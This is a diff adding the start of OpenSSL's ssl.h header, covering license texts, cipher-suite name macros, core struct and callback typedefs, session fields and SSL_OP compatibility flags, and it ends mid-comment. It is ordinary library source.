+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * ECC cipher suite support in OpenSSL originally developed by
+ * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright 2005 Nokia. All rights reserved.
+ *
+ * The portions of the attached software ("Contribution") is developed by
+ * Nokia Corporation and is licensed pursuant to the OpenSSL open source
+ * license.
+ *
+ * The Contribution, originally written by Mika Kousa and Pasi Eronen of
+ * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+ * support (see RFC 4279) to OpenSSL.
+ *
+ * No patent licenses or other rights except those expressly stated in
+ * the OpenSSL open source license shall be deemed granted or received
+ * expressly, by implication, estoppel, or otherwise.
+ *
+ * No assurances are provided by Nokia that the Contribution does not
+ * infringe the patent or other intellectual property rights of any third
+ * party or that the license provides you with all the necessary rights
+ * to make use of the Contribution.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+ * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+ * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+ * OTHERWISE.
+ */
+
+#ifndef HEADER_SSL_H
+# define HEADER_SSL_H
+
+# include <openssl/e_os2.h>
+
+# ifndef OPENSSL_NO_COMP
+#  include <openssl/comp.h>
+# endif
+# ifndef OPENSSL_NO_BIO
+#  include <openssl/bio.h>
+# endif
+# ifndef OPENSSL_NO_DEPRECATED
+#  ifndef OPENSSL_NO_X509
+#   include <openssl/x509.h>
+#  endif
+#  include <openssl/crypto.h>
+#  include <openssl/lhash.h>
+#  include <openssl/buffer.h>
+# endif
+# include <openssl/pem.h>
+# include <openssl/hmac.h>
+
+# include <openssl/kssl.h>
+# include <openssl/safestack.h>
+# include <openssl/symhacks.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* SSLeay version number for ASN.1 encoding of the session information */
+/*-
+ * Version 0 - initial version
+ * Version 1 - added the optional peer certificate
+ */
+# define SSL_SESSION_ASN1_VERSION 0x0001
+
+/* text strings for the ciphers */
+# define SSL_TXT_NULL_WITH_MD5           SSL2_TXT_NULL_WITH_MD5
+# define SSL_TXT_RC4_128_WITH_MD5        SSL2_TXT_RC4_128_WITH_MD5
+# define SSL_TXT_RC4_128_EXPORT40_WITH_MD5 SSL2_TXT_RC4_128_EXPORT40_WITH_MD5
+# define SSL_TXT_RC2_128_CBC_WITH_MD5    SSL2_TXT_RC2_128_CBC_WITH_MD5
+# define SSL_TXT_RC2_128_CBC_EXPORT40_WITH_MD5 SSL2_TXT_RC2_128_CBC_EXPORT40_WITH_MD5
+# define SSL_TXT_IDEA_128_CBC_WITH_MD5   SSL2_TXT_IDEA_128_CBC_WITH_MD5
+# define SSL_TXT_DES_64_CBC_WITH_MD5     SSL2_TXT_DES_64_CBC_WITH_MD5
+# define SSL_TXT_DES_64_CBC_WITH_SHA     SSL2_TXT_DES_64_CBC_WITH_SHA
+# define SSL_TXT_DES_192_EDE3_CBC_WITH_MD5 SSL2_TXT_DES_192_EDE3_CBC_WITH_MD5
+# define SSL_TXT_DES_192_EDE3_CBC_WITH_SHA SSL2_TXT_DES_192_EDE3_CBC_WITH_SHA
+
+/*
+ * VRS Additional Kerberos5 entries
+ */
+# define SSL_TXT_KRB5_DES_64_CBC_SHA   SSL3_TXT_KRB5_DES_64_CBC_SHA
+# define SSL_TXT_KRB5_DES_192_CBC3_SHA SSL3_TXT_KRB5_DES_192_CBC3_SHA
+# define SSL_TXT_KRB5_RC4_128_SHA      SSL3_TXT_KRB5_RC4_128_SHA
+# define SSL_TXT_KRB5_IDEA_128_CBC_SHA SSL3_TXT_KRB5_IDEA_128_CBC_SHA
+# define SSL_TXT_KRB5_DES_64_CBC_MD5   SSL3_TXT_KRB5_DES_64_CBC_MD5
+# define SSL_TXT_KRB5_DES_192_CBC3_MD5 SSL3_TXT_KRB5_DES_192_CBC3_MD5
+# define SSL_TXT_KRB5_RC4_128_MD5      SSL3_TXT_KRB5_RC4_128_MD5
+# define SSL_TXT_KRB5_IDEA_128_CBC_MD5 SSL3_TXT_KRB5_IDEA_128_CBC_MD5
+
+# define SSL_TXT_KRB5_DES_40_CBC_SHA   SSL3_TXT_KRB5_DES_40_CBC_SHA
+# define SSL_TXT_KRB5_RC2_40_CBC_SHA   SSL3_TXT_KRB5_RC2_40_CBC_SHA
+# define SSL_TXT_KRB5_RC4_40_SHA       SSL3_TXT_KRB5_RC4_40_SHA
+# define SSL_TXT_KRB5_DES_40_CBC_MD5   SSL3_TXT_KRB5_DES_40_CBC_MD5
+# define SSL_TXT_KRB5_RC2_40_CBC_MD5   SSL3_TXT_KRB5_RC2_40_CBC_MD5
+# define SSL_TXT_KRB5_RC4_40_MD5       SSL3_TXT_KRB5_RC4_40_MD5
+
+# define SSL_TXT_KRB5_DES_40_CBC_SHA   SSL3_TXT_KRB5_DES_40_CBC_SHA
+# define SSL_TXT_KRB5_DES_40_CBC_MD5   SSL3_TXT_KRB5_DES_40_CBC_MD5
+# define SSL_TXT_KRB5_DES_64_CBC_SHA   SSL3_TXT_KRB5_DES_64_CBC_SHA
+# define SSL_TXT_KRB5_DES_64_CBC_MD5   SSL3_TXT_KRB5_DES_64_CBC_MD5
+# define SSL_TXT_KRB5_DES_192_CBC3_SHA SSL3_TXT_KRB5_DES_192_CBC3_SHA
+# define SSL_TXT_KRB5_DES_192_CBC3_MD5 SSL3_TXT_KRB5_DES_192_CBC3_MD5
+# define SSL_MAX_KRB5_PRINCIPAL_LENGTH  256
+
+# define SSL_MAX_SSL_SESSION_ID_LENGTH           32
+# define SSL_MAX_SID_CTX_LENGTH                  32
+
+# define SSL_MIN_RSA_MODULUS_LENGTH_IN_BYTES     (512/8)
+# define SSL_MAX_KEY_ARG_LENGTH                  8
+# define SSL_MAX_MASTER_KEY_LENGTH               48
+
+/* These are used to specify which ciphers to use and not to use */
+
+# define SSL_TXT_EXP40           "EXPORT40"
+# define SSL_TXT_EXP56           "EXPORT56"
+# define SSL_TXT_LOW             "LOW"
+# define SSL_TXT_MEDIUM          "MEDIUM"
+# define SSL_TXT_HIGH            "HIGH"
+# define SSL_TXT_FIPS            "FIPS"
+
+# define SSL_TXT_kFZA            "kFZA"/* unused! */
+# define SSL_TXT_aFZA            "aFZA"/* unused! */
+# define SSL_TXT_eFZA            "eFZA"/* unused! */
+# define SSL_TXT_FZA             "FZA"/* unused! */
+
+# define SSL_TXT_aNULL           "aNULL"
+# define SSL_TXT_eNULL           "eNULL"
+# define SSL_TXT_NULL            "NULL"
+
+# define SSL_TXT_kRSA            "kRSA"
+# define SSL_TXT_kDHr            "kDHr"
+# define SSL_TXT_kDHd            "kDHd"
+# define SSL_TXT_kDH             "kDH"
+# define SSL_TXT_kEDH            "kEDH"
+# define SSL_TXT_kDHE            "kDHE"/* alias for kEDH */
+# define SSL_TXT_kKRB5           "kKRB5"
+# define SSL_TXT_kECDHr          "kECDHr"
+# define SSL_TXT_kECDHe          "kECDHe"
+# define SSL_TXT_kECDH           "kECDH"
+# define SSL_TXT_kEECDH          "kEECDH"
+# define SSL_TXT_kECDHE          "kECDHE"/* alias for kEECDH */
+# define SSL_TXT_kPSK            "kPSK"
+# define SSL_TXT_kGOST           "kGOST"
+# define SSL_TXT_kSRP            "kSRP"
+
+# define SSL_TXT_aRSA            "aRSA"
+# define SSL_TXT_aDSS            "aDSS"
+# define SSL_TXT_aDH             "aDH"
+# define SSL_TXT_aECDH           "aECDH"
+# define SSL_TXT_aKRB5           "aKRB5"
+# define SSL_TXT_aECDSA          "aECDSA"
+# define SSL_TXT_aPSK            "aPSK"
+# define SSL_TXT_aGOST94 "aGOST94"
+# define SSL_TXT_aGOST01 "aGOST01"
+# define SSL_TXT_aGOST  "aGOST"
+# define SSL_TXT_aSRP            "aSRP"
+
+# define SSL_TXT_DSS             "DSS"
+# define SSL_TXT_DH              "DH"
+# define SSL_TXT_EDH             "EDH"/* same as "kEDH:-ADH" */
+# define SSL_TXT_DHE             "DHE"/* alias for EDH */
+# define SSL_TXT_ADH             "ADH"
+# define SSL_TXT_RSA             "RSA"
+# define SSL_TXT_ECDH            "ECDH"
+# define SSL_TXT_EECDH           "EECDH"/* same as "kEECDH:-AECDH" */
+# define SSL_TXT_ECDHE           "ECDHE"/* alias for ECDHE" */
+# define SSL_TXT_AECDH           "AECDH"
+# define SSL_TXT_ECDSA           "ECDSA"
+# define SSL_TXT_KRB5            "KRB5"
+# define SSL_TXT_PSK             "PSK"
+# define SSL_TXT_SRP             "SRP"
+
+# define SSL_TXT_DES             "DES"
+# define SSL_TXT_3DES            "3DES"
+# define SSL_TXT_RC4             "RC4"
+# define SSL_TXT_RC2             "RC2"
+# define SSL_TXT_IDEA            "IDEA"
+# define SSL_TXT_SEED            "SEED"
+# define SSL_TXT_AES128          "AES128"
+# define SSL_TXT_AES256          "AES256"
+# define SSL_TXT_AES             "AES"
+# define SSL_TXT_AES_GCM         "AESGCM"
+# define SSL_TXT_CAMELLIA128     "CAMELLIA128"
+# define SSL_TXT_CAMELLIA256     "CAMELLIA256"
+# define SSL_TXT_CAMELLIA        "CAMELLIA"
+
+# define SSL_TXT_MD5             "MD5"
+# define SSL_TXT_SHA1            "SHA1"
+# define SSL_TXT_SHA             "SHA"/* same as "SHA1" */
+# define SSL_TXT_GOST94          "GOST94"
+# define SSL_TXT_GOST89MAC               "GOST89MAC"
+# define SSL_TXT_SHA256          "SHA256"
+# define SSL_TXT_SHA384          "SHA384"
+
+# define SSL_TXT_SSLV2           "SSLv2"
+# define SSL_TXT_SSLV3           "SSLv3"
+# define SSL_TXT_TLSV1           "TLSv1"
+# define SSL_TXT_TLSV1_1         "TLSv1.1"
+# define SSL_TXT_TLSV1_2         "TLSv1.2"
+
+# define SSL_TXT_EXP             "EXP"
+# define SSL_TXT_EXPORT          "EXPORT"
+
+# define SSL_TXT_ALL             "ALL"
+
+/*-
+ * COMPLEMENTOF* definitions. These identifiers are used to (de-select)
+ * ciphers normally not being used.
+ * Example: "RC4" will activate all ciphers using RC4 including ciphers
+ * without authentication, which would normally disabled by DEFAULT (due
+ * the "!ADH" being part of default). Therefore "RC4:!COMPLEMENTOFDEFAULT"
+ * will make sure that it is also disabled in the specific selection.
+ * COMPLEMENTOF* identifiers are portable between version, as adjustments
+ * to the default cipher setup will also be included here.
+ *
+ * COMPLEMENTOFDEFAULT does not experience the same special treatment that
+ * DEFAULT gets, as only selection is being done and no sorting as needed
+ * for DEFAULT.
+ */
+# define SSL_TXT_CMPALL          "COMPLEMENTOFALL"
+# define SSL_TXT_CMPDEF          "COMPLEMENTOFDEFAULT"
+
+/*
+ * The following cipher list is used by default. It also is substituted when
+ * an application-defined cipher list string starts with 'DEFAULT'.
+ */
+# define SSL_DEFAULT_CIPHER_LIST "ALL:!aNULL:!eNULL:!SSLv2"
+/*
+ * As of OpenSSL 1.0.0, ssl_create_cipher_list() in ssl/ssl_ciph.c always
+ * starts with a reasonable order, and all we have to do for DEFAULT is
+ * throwing out anonymous and unencrypted ciphersuites! (The latter are not
+ * actually enabled by ALL, but "ALL:RSA" would enable some of them.)
+ */
+
+/* Used in SSL_set_shutdown()/SSL_get_shutdown(); */
+# define SSL_SENT_SHUTDOWN       1
+# define SSL_RECEIVED_SHUTDOWN   2
+
+#ifdef __cplusplus
+}
+#endif
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# if (defined(OPENSSL_NO_RSA) || defined(OPENSSL_NO_MD5)) && !defined(OPENSSL_NO_SSL2)
+#  define OPENSSL_NO_SSL2
+# endif
+
+# define SSL_FILETYPE_ASN1       X509_FILETYPE_ASN1
+# define SSL_FILETYPE_PEM        X509_FILETYPE_PEM
+
+/*
+ * This is needed to stop compilers complaining about the 'struct ssl_st *'
+ * function parameters used to prototype callbacks in SSL_CTX.
+ */
+typedef struct ssl_st *ssl_crock_st;
+typedef struct tls_session_ticket_ext_st TLS_SESSION_TICKET_EXT;
+typedef struct ssl_method_st SSL_METHOD;
+typedef struct ssl_cipher_st SSL_CIPHER;
+typedef struct ssl_session_st SSL_SESSION;
+typedef struct tls_sigalgs_st TLS_SIGALGS;
+typedef struct ssl_conf_ctx_st SSL_CONF_CTX;
+
+DECLARE_STACK_OF(SSL_CIPHER)
+
+/* SRTP protection profiles for use with the use_srtp extension (RFC 5764)*/
+typedef struct srtp_protection_profile_st {
+    const char *name;
+    unsigned long id;
+} SRTP_PROTECTION_PROFILE;
+
+DECLARE_STACK_OF(SRTP_PROTECTION_PROFILE)
+
+typedef int (*tls_session_ticket_ext_cb_fn) (SSL *s,
+                                             const unsigned char *data,
+                                             int len, void *arg);
+typedef int (*tls_session_secret_cb_fn) (SSL *s, void *secret,
+                                         int *secret_len,
+                                         STACK_OF(SSL_CIPHER) *peer_ciphers,
+                                         SSL_CIPHER **cipher, void *arg);
+
+# ifndef OPENSSL_NO_TLSEXT
+
+/* Typedefs for handling custom extensions */
+
+typedef int (*custom_ext_add_cb) (SSL *s, unsigned int ext_type,
+                                  const unsigned char **out,
+                                  size_t *outlen, int *al, void *add_arg);
+
+typedef void (*custom_ext_free_cb) (SSL *s, unsigned int ext_type,
+                                    const unsigned char *out, void *add_arg);
+
+typedef int (*custom_ext_parse_cb) (SSL *s, unsigned int ext_type,
+                                    const unsigned char *in,
+                                    size_t inlen, int *al, void *parse_arg);
+
+# endif
+
+# ifndef OPENSSL_NO_SSL_INTERN
+
+/* used to hold info on the particular ciphers used */
+struct ssl_cipher_st {
+    int valid;
+    const char *name;           /* text name */
+    unsigned long id;           /* id, 4 bytes, first is version */
+    /*
+     * changed in 0.9.9: these four used to be portions of a single value
+     * 'algorithms'
+     */
+    unsigned long algorithm_mkey; /* key exchange algorithm */
+    unsigned long algorithm_auth; /* server authentication */
+    unsigned long algorithm_enc; /* symmetric encryption */
+    unsigned long algorithm_mac; /* symmetric authentication */
+    unsigned long algorithm_ssl; /* (major) protocol version */
+    unsigned long algo_strength; /* strength and export flags */
+    unsigned long algorithm2;   /* Extra flags */
+    int strength_bits;          /* Number of bits really used */
+    int alg_bits;               /* Number of bits for algorithm */
+};
+
+/* Used to hold functions for SSLv2 or SSLv3/TLSv1 functions */
+struct ssl_method_st {
+    int version;
+    int (*ssl_new) (SSL *s);
+    void (*ssl_clear) (SSL *s);
+    void (*ssl_free) (SSL *s);
+    int (*ssl_accept) (SSL *s);
+    int (*ssl_connect) (SSL *s);
+    int (*ssl_read) (SSL *s, void *buf, int len);
+    int (*ssl_peek) (SSL *s, void *buf, int len);
+    int (*ssl_write) (SSL *s, const void *buf, int len);
+    int (*ssl_shutdown) (SSL *s);
+    int (*ssl_renegotiate) (SSL *s);
+    int (*ssl_renegotiate_check) (SSL *s);
+    long (*ssl_get_message) (SSL *s, int st1, int stn, int mt, long
+                             max, int *ok);
+    int (*ssl_read_bytes) (SSL *s, int type, unsigned char *buf, int len,
+                           int peek);
+    int (*ssl_write_bytes) (SSL *s, int type, const void *buf_, int len);
+    int (*ssl_dispatch_alert) (SSL *s);
+    long (*ssl_ctrl) (SSL *s, int cmd, long larg, void *parg);
+    long (*ssl_ctx_ctrl) (SSL_CTX *ctx, int cmd, long larg, void *parg);
+    const SSL_CIPHER *(*get_cipher_by_char) (const unsigned char *ptr);
+    int (*put_cipher_by_char) (const SSL_CIPHER *cipher, unsigned char *ptr);
+    int (*ssl_pending) (const SSL *s);
+    int (*num_ciphers) (void);
+    const SSL_CIPHER *(*get_cipher) (unsigned ncipher);
+    const struct ssl_method_st *(*get_ssl_method) (int version);
+    long (*get_timeout) (void);
+    struct ssl3_enc_method *ssl3_enc; /* Extra SSLv3/TLS stuff */
+    int (*ssl_version) (void);
+    long (*ssl_callback_ctrl) (SSL *s, int cb_id, void (*fp) (void));
+    long (*ssl_ctx_callback_ctrl) (SSL_CTX *s, int cb_id, void (*fp) (void));
+};
+
+/*-
+ * Lets make this into an ASN.1 type structure as follows
+ * SSL_SESSION_ID ::= SEQUENCE {
+ *      version                 INTEGER,        -- structure version number
+ *      SSLversion              INTEGER,        -- SSL version number
+ *      Cipher                  OCTET STRING,   -- the 3 byte cipher ID
+ *      Session_ID              OCTET STRING,   -- the Session ID
+ *      Master_key              OCTET STRING,   -- the master key
+ *      KRB5_principal          OCTET STRING    -- optional Kerberos principal
+ *      Key_Arg [ 0 ] IMPLICIT  OCTET STRING,   -- the optional Key argument
+ *      Time [ 1 ] EXPLICIT     INTEGER,        -- optional Start Time
+ *      Timeout [ 2 ] EXPLICIT  INTEGER,        -- optional Timeout ins seconds
+ *      Peer [ 3 ] EXPLICIT     X509,           -- optional Peer Certificate
+ *      Session_ID_context [ 4 ] EXPLICIT OCTET STRING,   -- the Session ID context
+ *      Verify_result [ 5 ] EXPLICIT INTEGER,   -- X509_V_... code for `Peer'
+ *      HostName [ 6 ] EXPLICIT OCTET STRING,   -- optional HostName from servername TLS extension
+ *      PSK_identity_hint [ 7 ] EXPLICIT OCTET STRING, -- optional PSK identity hint
+ *      PSK_identity [ 8 ] EXPLICIT OCTET STRING,  -- optional PSK identity
+ *      Ticket_lifetime_hint [9] EXPLICIT INTEGER, -- server's lifetime hint for session ticket
+ *      Ticket [10]             EXPLICIT OCTET STRING, -- session ticket (clients only)
+ *      Compression_meth [11]   EXPLICIT OCTET STRING, -- optional compression method
+ *      SRP_username [ 12 ] EXPLICIT OCTET STRING -- optional SRP username
+ *      }
+ * Look in ssl/ssl_asn1.c for more details
+ * I'm using EXPLICIT tags so I can read the damn things using asn1parse :-).
+ */
+struct ssl_session_st {
+    int ssl_version;            /* what ssl version session info is being
+                                 * kept in here? */
+    /* only really used in SSLv2 */
+    unsigned int key_arg_length;
+    unsigned char key_arg[SSL_MAX_KEY_ARG_LENGTH];
+    int master_key_length;
+    unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH];
+    /* session_id - valid? */
+    unsigned int session_id_length;
+    unsigned char session_id[SSL_MAX_SSL_SESSION_ID_LENGTH];
+    /*
+     * this is used to determine whether the session is being reused in the
+     * appropriate context. It is up to the application to set this, via
+     * SSL_new
+     */
+    unsigned int sid_ctx_length;
+    unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH];
+#  ifndef OPENSSL_NO_KRB5
+    unsigned int krb5_client_princ_len;
+    unsigned char krb5_client_princ[SSL_MAX_KRB5_PRINCIPAL_LENGTH];
+#  endif                        /* OPENSSL_NO_KRB5 */
+#  ifndef OPENSSL_NO_PSK
+    char *psk_identity_hint;
+    char *psk_identity;
+#  endif
+    /*
+     * Used to indicate that session resumption is not allowed. Applications
+     * can also set this bit for a new session via not_resumable_session_cb
+     * to disable session caching and tickets.
+     */
+    int not_resumable;
+    /* The cert is the certificate used to establish this connection */
+    struct sess_cert_st /* SESS_CERT */ *sess_cert;
+    /*
+     * This is the cert for the other end. On clients, it will be the same as
+     * sess_cert->peer_key->x509 (the latter is not enough as sess_cert is
+     * not retained in the external representation of sessions, see
+     * ssl_asn1.c).
+     */
+    X509 *peer;
+    /*
+     * when app_verify_callback accepts a session where the peer's
+     * certificate is not ok, we must remember the error for session reuse:
+     */
+    long verify_result;         /* only for servers */
+    int references;
+    long timeout;
+    long time;
+    unsigned int compress_meth; /* Need to lookup the method */
+    const SSL_CIPHER *cipher;
+    unsigned long cipher_id;    /* when ASN.1 loaded, this needs to be used
+                                 * to load the 'cipher' structure */
+    STACK_OF(SSL_CIPHER) *ciphers; /* shared ciphers? */
+    CRYPTO_EX_DATA ex_data;     /* application specific data */
+    /*
+     * These are used to make removal of session-ids more efficient and to
+     * implement a maximum cache size.
+     */
+    struct ssl_session_st *prev, *next;
+#  ifndef OPENSSL_NO_TLSEXT
+    char *tlsext_hostname;
+#   ifndef OPENSSL_NO_EC
+    size_t tlsext_ecpointformatlist_length;
+    unsigned char *tlsext_ecpointformatlist; /* peer's list */
+    size_t tlsext_ellipticcurvelist_length;
+    unsigned char *tlsext_ellipticcurvelist; /* peer's list */
+#   endif                       /* OPENSSL_NO_EC */
+    /* RFC4507 info */
+    unsigned char *tlsext_tick; /* Session ticket */
+    size_t tlsext_ticklen;      /* Session ticket length */
+    long tlsext_tick_lifetime_hint; /* Session lifetime hint in seconds */
+#  endif
+#  ifndef OPENSSL_NO_SRP
+    char *srp_username;
+#  endif
+};
+
+# endif
+
+# define SSL_OP_MICROSOFT_SESS_ID_BUG                    0x00000001L
+# define SSL_OP_NETSCAPE_CHALLENGE_BUG                   0x00000002L
+/* Allow initial connection to servers that don't support RI */
+# define SSL_OP_LEGACY_SERVER_CONNECT                    0x00000004L
+# define SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG         0x00000008L
+# define SSL_OP_TLSEXT_PADDING                           0x00000010L
+# define SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER               0x00000020L
+# define SSL_OP_SAFARI_ECDHE_ECDSA_BUG                   0x00000040L
+# define SSL_OP_SSLEAY_080_CLIENT_DH_BUG                 0x00000080L
+# define SSL_OP_TLS_D5_BUG                               0x00000100L
+# define SSL_OP_TLS_BLOCK_PADDING_BUG                    0x00000200L
+
+/* Hasn't done anything since OpenSSL 0.9.7h, retained for compatibility */
+# define SSL_OP_MSIE_SSLV2_RSA_PADDING                   0x0
+/* Refers to ancient SSLREF and SSLv2, retained for compatibility */
+# define SSL_OP_SSLREF2_REUSE_CERT_TYPE_BUG              0x0
+
+/*
+ * Disable SSL 3.0/TLS 1.0 CBC vulnerability workaround that was added in
+ * OpenSSL 0.9.6d.  Usually (depending on the application protocol) the
+ * workaround is not needed.  Unfortunately some broken SSL/TLS
+ * implementations cannot handle it at all, which is why we include it in
+ * SSL_OP_ALL.
+ */
+/* added in 0.9.6e */
+# define SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS              0x00000800L
+
+/*
+ * SSL_OP_ALL: various bug workarounds that should be rather harmless.  This
+ * used to be 0x000FFFFFL before 0.9.7.
+ */
+# define SSL_OP_ALL                                      0x80000BFFL
+
+/* DTLS options */
+# define SSL_OP_NO_QUERY_MTU                 0x00001000L
+/* Turn on Cookie Exchange (on relevant for servers) */
+# define SSL_OP_COOKIE_EXCHANGE              0x00002000L
+/* Don't use RFC4507 ticket extension */
+# define SSL_OP_NO_TICKET                    0x00004000L
+/* Use Cisco's "speshul" version of DTLS_BAD_VER (as client)  */
+# define SSL_OP_CISCO_ANYCONNECT             0x00008000L
+
+/* As server, disallow session resumption on renegotiation */
+# define SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION   0x00010000L
+/* Don't use compression even if supported */
+# define SSL_OP_NO_COMPRESSION                           0x00020000L
+/* Permit unsafe legacy renegotiation */
+# define SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION        0x00040000L
+/* If set, always create a new key when using tmp_ecdh parameters */
+# define SSL_OP_SINGLE_ECDH_USE                          0x00080000L
+/* If set, always create a new key when using tmp_dh parameters */
+# define SSL_OP_SINGLE_DH_USE                            0x00100000L
+/* Does nothing: retained for compatibiity */
+# define SSL_OP_EPHEMERAL_RSA                            0x0
+/*
+ * Set on servers to choose the cipher according to the server's preferences
+ */
+# define SSL_OP_CIPHER_SERVER_PREFERENCE                 0x00400000L
+/*
+ * If set, a server will allow a client to issue a SSLv3.0 version number as
+ * latest version supported in the premaster secret, even when TLSv1.0
+ * (version 3.1) was announced in the client hello. Normally this is
+ * forbidden to prevent version rollback attacks.
+ */
+# define SSL_OP_TLS_ROLLBACK_BUG                         0x00800000L
+
+# define SSL_OP_NO_SSLv2                                 0x01000000L
+# define SSL_OP_NO_SSLv3                                 0x02000000L
+# define SSL_OP_NO_TLSv1                                 0x04000000L
+# define SSL_OP_NO_TLSv1_2                               0x08000000L
+# define SSL_OP_NO_TLSv1_1                               0x10000000L
+
+# define SSL_OP_NO_DTLSv1                                0x04000000L
+# define SSL_OP_NO_DTLSv1_2                              0x08000000L
+
+# define SSL_OP_NO_SSL_MASK (SSL_OP_NO_SSLv2|SSL_OP_NO_SSLv3|\
+        SSL_OP_NO_TLSv1|SSL_OP_NO_TLSv1_1|SSL_OP_NO_TLSv1_2)
+
+/*
+ * These next two were never actually used for anything since SSLeay zap so
+ * we have some more flags.
+ */
+/*
+ * The next flag deliberately changes the ciphertest, this is a check for the
+ * PKCS#1 attack
+ */
+# define SSL_OP_PKCS1_CHECK_1                            0x0
+# define SSL_OP_PKCS1_CHECK_2                            0x0
+
+# define SSL_OP_NETSCAPE_CA_DN_BUG                       0x20000000L
+# define SSL_OP_NETSCAPE_DEMO_CIPHER_CHANGE_BUG          0x40000000L
+/*
+ * Make server add server-hello extension from early version of cryptopro
+ * draft, when GOST ciphersuite is negotiated. Required for interoperability
+ * with CryptoPro CSP 3.x
+ */
+# define SSL_OP_CRYPTOPRO_TLSEXT_BUG                     0x80000000L
+
+/*
+ * Allow SSL_write(..., n) to return r with 0 < r < n (i.e. report success
+ * when just a single record has been written):
+ */
+# define SSL_MODE_ENABLE_PARTIAL_WRITE       0x00000001L
+/*
